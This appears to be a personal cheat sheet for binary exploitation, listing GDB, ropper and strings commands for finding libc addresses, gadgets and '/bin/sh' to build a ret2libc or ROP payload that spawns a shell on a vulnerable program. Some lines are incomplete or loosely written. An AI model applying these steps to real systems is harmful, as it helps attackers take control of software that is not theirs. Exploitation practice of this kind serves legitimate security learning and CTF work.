Make sure to set a breakpoint and run the program before running the commands below when trying them from GDB
# Find system address
p system
xinfo system
#Find Exit address
p exit
#Check whether libc is being used - copy libc to the current working directory for ease of use.
# Copy Libc base address
# Default path = /lib/x86_64-linux-gnu/
vmmap libc
#Find JMP RSP or JMP RAX or any other instruction
# if you are unable to find the instruction in your vuln binary, search for it in libc
file ./vuln or file ./libc
search jmp rsp
#if you are unable to find JMP instruction try CALL
search call rsp
#Finding "/bin/sh"
find "/bin/sh"
strings -a -t x | grep "/bin/sh"
ropper --file --string '/bin/sh'
# Search for ret instruction, look for a single ret without any other instructions.
ropper --file --search "ret"
0x00000000000008aa: ret;
#When you take an address from libc externally (e.g. from ropper or strings), add the libc base address (the first address shown by `vmmap libc`) to the offset you got from ropper or strings - the same applies to any other instruction.
#Change ropper search depth -
# /1/ - 1 level down, /2/ - 2 levels down
# better to pick a gadget that ends with ret for ret2libc
> file ./vuln_file or file ./libc
> search /1/ pop rdi
#Keep stdin open after the payload is sent
(cat payload;cat ) | ./vuln